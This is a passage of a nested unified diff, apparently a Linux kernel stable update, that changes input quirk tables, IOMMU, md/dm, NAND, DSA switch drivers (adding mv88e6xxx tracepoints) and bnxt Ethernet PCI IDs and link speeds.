+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -610,6 +610,14 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		},
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
+ 	},
++	{
++		/* Fujitsu Lifebook A574/H */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "FUJITSU"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "FMVA0501PZ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX)
++	},
+ 	{
+ 		/* Gigabyte M912 */
+ 		.matches = {
+@@ -1116,6 +1124,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However both are required for the keyboard to not fail
++		 * completely sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "N150CU"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NH5xAx"),
+@@ -1123,6 +1145,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * Setting SERIO_QUIRK_NOMUX or SERIO_QUIRK_RESET_ALWAYS makes
++		 * the keyboard very laggy for ~5 seconds after boot and
++		 * sometimes also after resume.
++		 * However both are required for the keyboard to not fail
++		 * completely sometimes after boot or resume.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NHxxRZQ"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
++					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "NL5xRU"),
+diff --git a/drivers/input/touchscreen/goodix.c b/drivers/input/touchscreen/goodix.c
+index c281e49826c23..25e575183dd18 100644
+--- a/drivers/input/touchscreen/goodix.c
++++ b/drivers/input/touchscreen/goodix.c
+@@ -124,10 +124,18 @@ static const unsigned long goodix_irq_flags[] = {
+ static const struct dmi_system_id nine_bytes_report[] = {
+ #if defined(CONFIG_DMI) && defined(CONFIG_X86)
+ 	{
+-		.ident = "Lenovo YogaBook",
+-		/* YB1-X91L/F and YB1-X90L/F */
++		/* Lenovo Yoga Book X90F / X90L */
+ 		.matches = {
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X9")
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		}
++	},
++	{
++		/* Lenovo Yoga Book X91F / X91L */
++		.matches = {
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		}
+ 	},
+ #endif
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index bc94059a5b870..f800989ea0462 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -1057,7 +1057,8 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ 	}
+ 
+ 	err = -EINVAL;
+-	if (cap_sagaw(iommu->cap) == 0) {
++	if (!cap_sagaw(iommu->cap) &&
++	    (!ecap_smts(iommu->ecap) || ecap_slts(iommu->ecap))) {
+ 		pr_info("%s: No supported address widths. Not attempting DMA translation.\n",
+ 			iommu->name);
+ 		drhd->ignored = 1;
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 89bf28ed874c2..38d8aa21ef7ac 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -1522,6 +1522,8 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		ret = 1;
+ 		break;
+ 	default:
++		if (len)
++			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+ 		alloc_multiple_bios(&blist, ci, ti, num_bios);
+ 		while ((clone = bio_list_pop(&blist))) {
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 0368b3c51c7f7..d5c362b1602b6 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -3152,6 +3152,9 @@ slot_store(struct md_rdev *rdev, const char *buf, size_t len)
+ 		err = kstrtouint(buf, 10, (unsigned int *)&slot);
+ 		if (err < 0)
+ 			return err;
++		if (slot < 0)
++			/* overflow */
++			return -ENOSPC;
+ 	}
+ 	if (rdev->mddev->pers && slot == -1) {
+ 		/* Setting 'slot' on an active array requires also
+diff --git a/drivers/mtd/nand/ecc-mxic.c b/drivers/mtd/nand/ecc-mxic.c
+index 8afdca731b874..6b487ffe2f2dc 100644
+--- a/drivers/mtd/nand/ecc-mxic.c
++++ b/drivers/mtd/nand/ecc-mxic.c
+@@ -429,6 +429,7 @@ static int mxic_ecc_data_xfer_wait_for_completion(struct mxic_ecc_engine *mxic)
+ 		mxic_ecc_enable_int(mxic);
+ 		ret = wait_for_completion_timeout(&mxic->complete,
+ 						  msecs_to_jiffies(1000));
++		ret = ret ? 0 : -ETIMEDOUT;
+ 		mxic_ecc_disable_int(mxic);
+ 	} else {
+ 		ret = readl_poll_timeout(mxic->regs + INTRPT_STS, val,
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 5ee01231ac4cd..a28574c009003 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -176,6 +176,7 @@ struct meson_nfc {
+ 
+ 	dma_addr_t daddr;
+ 	dma_addr_t iaddr;
++	u32 info_bytes;
+ 
+ 	unsigned long assigned_cs;
+ };
+@@ -503,6 +504,7 @@ static int meson_nfc_dma_buffer_setup(struct nand_chip *nand, void *databuf,
+ 					 nfc->daddr, datalen, dir);
+ 			return ret;
+ 		}
++		nfc->info_bytes = infolen;
+ 		cmd = GENCMDIADDRL(NFC_CMD_AIL, nfc->iaddr);
+ 		writel(cmd, nfc->reg_base + NFC_REG_CMD);
+ 
+@@ -520,8 +522,10 @@ static void meson_nfc_dma_buffer_release(struct nand_chip *nand,
+ 	struct meson_nfc *nfc = nand_get_controller_data(nand);
+ 
+ 	dma_unmap_single(nfc->dev, nfc->daddr, datalen, dir);
+-	if (infolen)
++	if (infolen) {
+ 		dma_unmap_single(nfc->dev, nfc->iaddr, infolen, dir);
++		nfc->info_bytes = 0;
++	}
+ }
+ 
+ static int meson_nfc_read_buf(struct nand_chip *nand, u8 *buf, int len)
+@@ -710,6 +714,8 @@ static void meson_nfc_check_ecc_pages_valid(struct meson_nfc *nfc,
+ 		usleep_range(10, 15);
+ 		/* info is updated by nfc dma engine*/
+ 		smp_rmb();
++		dma_sync_single_for_cpu(nfc->dev, nfc->iaddr, nfc->info_bytes,
++					DMA_FROM_DEVICE);
+ 		ret = *info & ECC_COMPLETE;
+ 	} while (!ret);
+ }
+@@ -991,7 +997,7 @@ static const struct mtd_ooblayout_ops meson_ooblayout_ops = {
+ 
+ static int meson_nfc_clk_init(struct meson_nfc *nfc)
+ {
+-	struct clk_parent_data nfc_divider_parent_data[1];
++	struct clk_parent_data nfc_divider_parent_data[1] = {0};
+ 	struct clk_init_data init = {0};
+ 	int ret;
+ 
+diff --git a/drivers/net/dsa/microchip/ksz8795.c b/drivers/net/dsa/microchip/ksz8795.c
+index bd3b133e7085b..22250ae222b5b 100644
+--- a/drivers/net/dsa/microchip/ksz8795.c
++++ b/drivers/net/dsa/microchip/ksz8795.c
+@@ -907,15 +907,14 @@ int ksz8_fdb_dump(struct ksz_device *dev, int port,
+ 	u16 entries = 0;
+ 	u8 timestamp = 0;
+ 	u8 fid;
+-	u8 member;
+-	struct alu_struct alu;
++	u8 src_port;
++	u8 mac[ETH_ALEN];
+ 
+ 	do {
+-		alu.is_static = false;
+-		ret = ksz8_r_dyn_mac_table(dev, i, alu.mac, &fid, &member,
++		ret = ksz8_r_dyn_mac_table(dev, i, mac, &fid, &src_port,
+ 					   &timestamp, &entries);
+-		if (!ret && (member & BIT(port))) {
+-			ret = cb(alu.mac, alu.fid, alu.is_static, data);
++		if (!ret && port == src_port) {
++			ret = cb(mac, fid, false, data);
+ 			if (ret)
+ 				break;
+ 		}
+diff --git a/drivers/net/dsa/microchip/ksz8863_smi.c b/drivers/net/dsa/microchip/ksz8863_smi.c
+index ddb40838181ef..ed77ac2228951 100644
+--- a/drivers/net/dsa/microchip/ksz8863_smi.c
++++ b/drivers/net/dsa/microchip/ksz8863_smi.c
+@@ -82,22 +82,16 @@ static const struct regmap_bus regmap_smi[] = {
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+-		.max_raw_read = 1,
+-		.max_raw_write = 1,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 2,
+-		.max_raw_write = 2,
+ 	},
+ 	{
+ 		.read = ksz8863_mdio_read,
+ 		.write = ksz8863_mdio_write,
+ 		.val_format_endian_default = REGMAP_ENDIAN_BIG,
+-		.max_raw_read = 4,
+-		.max_raw_write = 4,
+ 	}
+ };
+ 
+@@ -108,7 +102,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 8,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -118,7 +111,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 16,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	},
+@@ -128,7 +120,6 @@ static const struct regmap_config ksz8863_regmap_config[] = {
+ 		.pad_bits = 24,
+ 		.val_bits = 32,
+ 		.cache_type = REGCACHE_NONE,
+-		.use_single_read = 1,
+ 		.lock = ksz_regmap_lock,
+ 		.unlock = ksz_regmap_unlock,
+ 	}
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index 07f6776bba12b..3d59298eaa5cf 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -357,13 +357,13 @@ static const u32 ksz8863_masks[] = {
+ 	[VLAN_TABLE_VALID]		= BIT(19),
+ 	[STATIC_MAC_TABLE_VALID]	= BIT(19),
+ 	[STATIC_MAC_TABLE_USE_FID]	= BIT(21),
+-	[STATIC_MAC_TABLE_FID]		= GENMASK(29, 26),
++	[STATIC_MAC_TABLE_FID]		= GENMASK(25, 22),
+ 	[STATIC_MAC_TABLE_OVERRIDE]	= BIT(20),
+ 	[STATIC_MAC_TABLE_FWD_PORTS]	= GENMASK(18, 16),
+-	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(5, 0),
+-	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(7),
++	[DYNAMIC_MAC_TABLE_ENTRIES_H]	= GENMASK(1, 0),
++	[DYNAMIC_MAC_TABLE_MAC_EMPTY]	= BIT(2),
+ 	[DYNAMIC_MAC_TABLE_NOT_READY]	= BIT(7),
+-	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 28),
++	[DYNAMIC_MAC_TABLE_ENTRIES]	= GENMASK(31, 24),
+ 	[DYNAMIC_MAC_TABLE_FID]		= GENMASK(19, 16),
+ 	[DYNAMIC_MAC_TABLE_SRC_PORT]	= GENMASK(21, 20),
+ 	[DYNAMIC_MAC_TABLE_TIMESTAMP]	= GENMASK(23, 22),
+@@ -373,10 +373,10 @@ static u8 ksz8863_shifts[] = {
+ 	[VLAN_TABLE_MEMBERSHIP_S]	= 16,
+ 	[STATIC_MAC_FWD_PORTS]		= 16,
+ 	[STATIC_MAC_FID]		= 22,
+-	[DYNAMIC_MAC_ENTRIES_H]		= 3,
++	[DYNAMIC_MAC_ENTRIES_H]		= 8,
+ 	[DYNAMIC_MAC_ENTRIES]		= 24,
+ 	[DYNAMIC_MAC_FID]		= 16,
+-	[DYNAMIC_MAC_TIMESTAMP]		= 24,
++	[DYNAMIC_MAC_TIMESTAMP]		= 22,
+ 	[DYNAMIC_MAC_SRC_PORT]		= 20,
+ };
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/Makefile b/drivers/net/dsa/mv88e6xxx/Makefile
+index c8eca2b6f9594..49bf358b9c4fa 100644
+--- a/drivers/net/dsa/mv88e6xxx/Makefile
++++ b/drivers/net/dsa/mv88e6xxx/Makefile
+@@ -15,3 +15,7 @@ mv88e6xxx-objs += port_hidden.o
+ mv88e6xxx-$(CONFIG_NET_DSA_MV88E6XXX_PTP) += ptp.o
+ mv88e6xxx-objs += serdes.o
+ mv88e6xxx-objs += smi.o
++mv88e6xxx-objs += trace.o
++
++# for tracing framework to find trace.h
++CFLAGS_trace.o := -I$(src)
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 3a6db36574ad7..8cf27e2654fcf 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3354,9 +3354,14 @@ static int mv88e6xxx_setup_port(struct mv88e6xxx_chip *chip, int port)
+ 	 * If this is the upstream port for this switch, enable
+ 	 * forwarding of unknown unicasts and multicasts.
+ 	 */
+-	reg = MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP |
+-		MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
++	reg = MV88E6185_PORT_CTL0_USE_TAG | MV88E6185_PORT_CTL0_USE_IP |
+ 		MV88E6XXX_PORT_CTL0_STATE_FORWARDING;
++	/* Forward any IPv4 IGMP or IPv6 MLD frames received
++	 * by a USER port to the CPU port to allow snooping.
++	 */
++	if (dsa_is_user_port(ds, port))
++		reg |= MV88E6XXX_PORT_CTL0_IGMP_MLD_SNOOP;
++
+ 	err = mv88e6xxx_port_write(chip, port, MV88E6XXX_PORT_CTL0, reg);
+ 	if (err)
+ 		return err;
+diff --git a/drivers/net/dsa/mv88e6xxx/global1_atu.c b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+index 40bd67a5c8e93..7c513a03789cf 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1_atu.c
++++ b/drivers/net/dsa/mv88e6xxx/global1_atu.c
+@@ -12,6 +12,7 @@
+ 
+ #include "chip.h"
+ #include "global1.h"
++#include "trace.h"
+ 
+ /* Offset 0x01: ATU FID Register */
+ 
+@@ -114,6 +115,19 @@ static int mv88e6xxx_g1_atu_op_wait(struct mv88e6xxx_chip *chip)
+ 	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_ATU_OP, bit, 0);
+ }
+ 
++static int mv88e6xxx_g1_read_atu_violation(struct mv88e6xxx_chip *chip)
++{
++	int err;
++
++	err = mv88e6xxx_g1_write(chip, MV88E6XXX_G1_ATU_OP,
++				 MV88E6XXX_G1_ATU_OP_BUSY |
++				 MV88E6XXX_G1_ATU_OP_GET_CLR_VIOLATION);
++	if (err)
++		return err;
++
++	return mv88e6xxx_g1_atu_op_wait(chip);
++}
++
+ static int mv88e6xxx_g1_atu_op(struct mv88e6xxx_chip *chip, u16 fid, u16 op)
+ {
+ 	u16 val;
+@@ -159,6 +173,41 @@ int mv88e6xxx_g1_atu_get_next(struct mv88e6xxx_chip *chip, u16 fid)
+ 	return mv88e6xxx_g1_atu_op(chip, fid, MV88E6XXX_G1_ATU_OP_GET_NEXT_DB);
+ }
+ 
++static int mv88e6xxx_g1_atu_fid_read(struct mv88e6xxx_chip *chip, u16 *fid)
++{
++	u16 val = 0, upper = 0, op = 0;
++	int err = -EOPNOTSUPP;
++
++	if (mv88e6xxx_num_databases(chip) > 256) {
++		err = mv88e6xxx_g1_read(chip, MV88E6352_G1_ATU_FID, &val);
++		val &= 0xfff;
++		if (err)
++			return err;
++	} else {
++		err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_ATU_OP, &op);
++		if (err)
++			return err;
++		if (mv88e6xxx_num_databases(chip) > 64) {
++			/* ATU DBNum[7:4] are located in ATU Control 15:12 */
++			err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_ATU_CTL,
++						&upper);
++			if (err)
++				return err;
++
++			upper = (upper >> 8) & 0x00f0;
++		} else if (mv88e6xxx_num_databases(chip) > 16) {
++			/* ATU DBNum[5:4] are located in ATU Operation 9:8 */
++			upper = (op >> 4) & 0x30;
++		}
++
++		/* ATU DBNum[3:0] are located in ATU Operation 3:0 */
++		val = (op & 0xf) | upper;
++	}
++	*fid = val;
++
++	return err;
++}
++
+ /* Offset 0x0C: ATU Data Register */
+ 
+ static int mv88e6xxx_g1_atu_data_read(struct mv88e6xxx_chip *chip,
+@@ -353,14 +402,12 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ {
+ 	struct mv88e6xxx_chip *chip = dev_id;
+ 	struct mv88e6xxx_atu_entry entry;
+-	int spid;
+-	int err;
+-	u16 val;
++	int err, spid;
++	u16 val, fid;
+ 
+ 	mv88e6xxx_reg_lock(chip);
+ 
+-	err = mv88e6xxx_g1_atu_op(chip, 0,
+-				  MV88E6XXX_G1_ATU_OP_GET_CLR_VIOLATION);
++	err = mv88e6xxx_g1_read_atu_violation(chip);
+ 	if (err)
+ 		goto out;
+ 
+@@ -368,6 +415,10 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ 	if (err)
+ 		goto out;
+ 
++	err = mv88e6xxx_g1_atu_fid_read(chip, &fid);
++	if (err)
++		goto out;
++
+ 	err = mv88e6xxx_g1_atu_data_read(chip, &entry);
+ 	if (err)
+ 		goto out;
+@@ -385,23 +436,23 @@ static irqreturn_t mv88e6xxx_g1_atu_prob_irq_thread_fn(int irq, void *dev_id)
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_ATU_OP_MEMBER_VIOLATION) {
+-		dev_err_ratelimited(chip->dev,
+-				    "ATU member violation for %pM portvec %x spid %d\n",
+-				    entry.mac, entry.portvec, spid);
++		trace_mv88e6xxx_atu_member_violation(chip->dev, spid,
++						     entry.portvec, entry.mac,
++						     fid);
+ 		chip->ports[spid].atu_member_violation++;
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_ATU_OP_MISS_VIOLATION) {
+-		dev_err_ratelimited(chip->dev,
+-				    "ATU miss violation for %pM portvec %x spid %d\n",
+-				    entry.mac, entry.portvec, spid);
++		trace_mv88e6xxx_atu_miss_violation(chip->dev, spid,
++						   entry.portvec, entry.mac,
++						   fid);
+ 		chip->ports[spid].atu_miss_violation++;
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_ATU_OP_FULL_VIOLATION) {
+-		dev_err_ratelimited(chip->dev,
+-				    "ATU full violation for %pM portvec %x spid %d\n",
+-				    entry.mac, entry.portvec, spid);
++		trace_mv88e6xxx_atu_full_violation(chip->dev, spid,
++						   entry.portvec, entry.mac,
++						   fid);
+ 		chip->ports[spid].atu_full_violation++;
+ 	}
+ 	mv88e6xxx_reg_unlock(chip);
+diff --git a/drivers/net/dsa/mv88e6xxx/global1_vtu.c b/drivers/net/dsa/mv88e6xxx/global1_vtu.c
+index 38e18f5811bfb..bcfb4a812055c 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1_vtu.c
++++ b/drivers/net/dsa/mv88e6xxx/global1_vtu.c
+@@ -13,6 +13,7 @@
+ 
+ #include "chip.h"
+ #include "global1.h"
++#include "trace.h"
+ 
+ /* Offset 0x02: VTU FID Register */
+ 
+@@ -628,14 +629,12 @@ static irqreturn_t mv88e6xxx_g1_vtu_prob_irq_thread_fn(int irq, void *dev_id)
+ 	spid = val & MV88E6XXX_G1_VTU_OP_SPID_MASK;
+ 
+ 	if (val & MV88E6XXX_G1_VTU_OP_MEMBER_VIOLATION) {
+-		dev_err_ratelimited(chip->dev, "VTU member violation for vid %d, source port %d\n",
+-				    vid, spid);
++		trace_mv88e6xxx_vtu_member_violation(chip->dev, spid, vid);
+ 		chip->ports[spid].vtu_member_violation++;
+ 	}
+ 
+ 	if (val & MV88E6XXX_G1_VTU_OP_MISS_VIOLATION) {
+-		dev_dbg_ratelimited(chip->dev, "VTU miss violation for vid %d, source port %d\n",
+-				    vid, spid);
++		trace_mv88e6xxx_vtu_miss_violation(chip->dev, spid, vid);
+ 		chip->ports[spid].vtu_miss_violation++;
+ 	}
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/trace.c b/drivers/net/dsa/mv88e6xxx/trace.c
+new file mode 100644
+index 0000000000000..7833cb50ca5d7
+--- /dev/null
++++ b/drivers/net/dsa/mv88e6xxx/trace.c
+@@ -0,0 +1,6 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/* Copyright 2022 NXP
++ */
++
++#define CREATE_TRACE_POINTS
++#include "trace.h"
+diff --git a/drivers/net/dsa/mv88e6xxx/trace.h b/drivers/net/dsa/mv88e6xxx/trace.h
+new file mode 100644
+index 0000000000000..f59ca04768e79
+--- /dev/null
++++ b/drivers/net/dsa/mv88e6xxx/trace.h
+@@ -0,0 +1,96 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/* Copyright 2022 NXP
++ */
++
++#undef TRACE_SYSTEM
++#define TRACE_SYSTEM	mv88e6xxx
++
++#if !defined(_MV88E6XXX_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
++#define _MV88E6XXX_TRACE_H
++
++#include <linux/device.h>
++#include <linux/if_ether.h>
++#include <linux/tracepoint.h>
++
++DECLARE_EVENT_CLASS(mv88e6xxx_atu_violation,
++
++	TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		 const unsigned char *addr, u16 fid),
++
++	TP_ARGS(dev, spid, portvec, addr, fid),
++
++	TP_STRUCT__entry(
++		__string(name, dev_name(dev))
++		__field(int, spid)
++		__field(u16, portvec)
++		__array(unsigned char, addr, ETH_ALEN)
++		__field(u16, fid)
++	),
++
++	TP_fast_assign(
++		__assign_str(name, dev_name(dev));
++		__entry->spid = spid;
++		__entry->portvec = portvec;
++		memcpy(__entry->addr, addr, ETH_ALEN);
++		__entry->fid = fid;
++	),
++
++	TP_printk("dev %s spid %d portvec 0x%x addr %pM fid %u",
++		  __get_str(name), __entry->spid, __entry->portvec,
++		  __entry->addr, __entry->fid)
++);
++
++DEFINE_EVENT(mv88e6xxx_atu_violation, mv88e6xxx_atu_member_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		      const unsigned char *addr, u16 fid),
++	     TP_ARGS(dev, spid, portvec, addr, fid));
++
++DEFINE_EVENT(mv88e6xxx_atu_violation, mv88e6xxx_atu_miss_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		      const unsigned char *addr, u16 fid),
++	     TP_ARGS(dev, spid, portvec, addr, fid));
++
++DEFINE_EVENT(mv88e6xxx_atu_violation, mv88e6xxx_atu_full_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 portvec,
++		      const unsigned char *addr, u16 fid),
++	     TP_ARGS(dev, spid, portvec, addr, fid));
++
++DECLARE_EVENT_CLASS(mv88e6xxx_vtu_violation,
++
++	TP_PROTO(const struct device *dev, int spid, u16 vid),
++
++	TP_ARGS(dev, spid, vid),
++
++	TP_STRUCT__entry(
++		__string(name, dev_name(dev))
++		__field(int, spid)
++		__field(u16, vid)
++	),
++
++	TP_fast_assign(
++		__assign_str(name, dev_name(dev));
++		__entry->spid = spid;
++		__entry->vid = vid;
++	),
++
++	TP_printk("dev %s spid %d vid %u",
++		  __get_str(name), __entry->spid, __entry->vid)
++);
++
++DEFINE_EVENT(mv88e6xxx_vtu_violation, mv88e6xxx_vtu_member_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 vid),
++	     TP_ARGS(dev, spid, vid));
++
++DEFINE_EVENT(mv88e6xxx_vtu_violation, mv88e6xxx_vtu_miss_violation,
++	     TP_PROTO(const struct device *dev, int spid, u16 vid),
++	     TP_ARGS(dev, spid, vid));
++
++#endif /* _MV88E6XXX_TRACE_H */
++
++/* We don't want to use include/trace/events */
++#undef TRACE_INCLUDE_PATH
++#define TRACE_INCLUDE_PATH .
++#undef TRACE_INCLUDE_FILE
++#define TRACE_INCLUDE_FILE	trace
++/* This part must be outside protection */
++#include <trace/define_trace.h>
+diff --git a/drivers/net/dsa/realtek/realtek-mdio.c b/drivers/net/dsa/realtek/realtek-mdio.c
+index 3e54fac5f9027..5a8fe707ca25e 100644
+--- a/drivers/net/dsa/realtek/realtek-mdio.c
++++ b/drivers/net/dsa/realtek/realtek-mdio.c
+@@ -21,6 +21,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/of_device.h>
++#include <linux/overflow.h>
+ #include <linux/regmap.h>
+ 
+ #include "realtek.h"
+@@ -152,7 +153,9 @@ static int realtek_mdio_probe(struct mdio_device *mdiodev)
+ 	if (!var)
+ 		return -EINVAL;
+ 
+-	priv = devm_kzalloc(&mdiodev->dev, sizeof(*priv), GFP_KERNEL);
++	priv = devm_kzalloc(&mdiodev->dev,
++			    size_add(sizeof(*priv), var->chip_data_sz),
++			    GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 251b102d2792b..c6e36603bd2db 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -175,12 +175,12 @@ static const struct pci_device_id bnxt_pci_tbl[] = {
+ 	{ PCI_VDEVICE(BROADCOM, 0x1750), .driver_data = BCM57508 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1751), .driver_data = BCM57504 },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1752), .driver_data = BCM57502 },
+-	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1800), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1801), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57502_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1802), .driver_data = BCM57508_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1803), .driver_data = BCM57502_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0x1804), .driver_data = BCM57504_NPAR },
+-	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57502_NPAR },
++	{ PCI_VDEVICE(BROADCOM, 0x1805), .driver_data = BCM57508_NPAR },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd802), .driver_data = BCM58802 },
+ 	{ PCI_VDEVICE(BROADCOM, 0xd804), .driver_data = BCM58804 },
+ #ifdef CONFIG_BNXT_SRIOV
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index 02741d499bf4a..1d2588c92977e 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -1225,6 +1225,7 @@ struct bnxt_link_info {
+ #define BNXT_LINK_SPEED_40GB	PORT_PHY_QCFG_RESP_LINK_SPEED_40GB
+ #define BNXT_LINK_SPEED_50GB	PORT_PHY_QCFG_RESP_LINK_SPEED_50GB
+ #define BNXT_LINK_SPEED_100GB	PORT_PHY_QCFG_RESP_LINK_SPEED_100GB
++#define BNXT_LINK_SPEED_200GB	PORT_PHY_QCFG_RESP_LINK_SPEED_200GB
+ 	u16			support_speeds;
+ 	u16			support_pam4_speeds;
+ 	u16			auto_link_speeds;	/* fw adv setting */
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 703fc163235f9..01b973bc509f5 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -1712,6 +1712,8 @@ u32 bnxt_fw_to_ethtool_speed(u16 fw_link_speed)
+ 		return SPEED_50000;
+ 	case BNXT_LINK_SPEED_100GB:
+ 		return SPEED_100000;
++	case BNXT_LINK_SPEED_200GB:
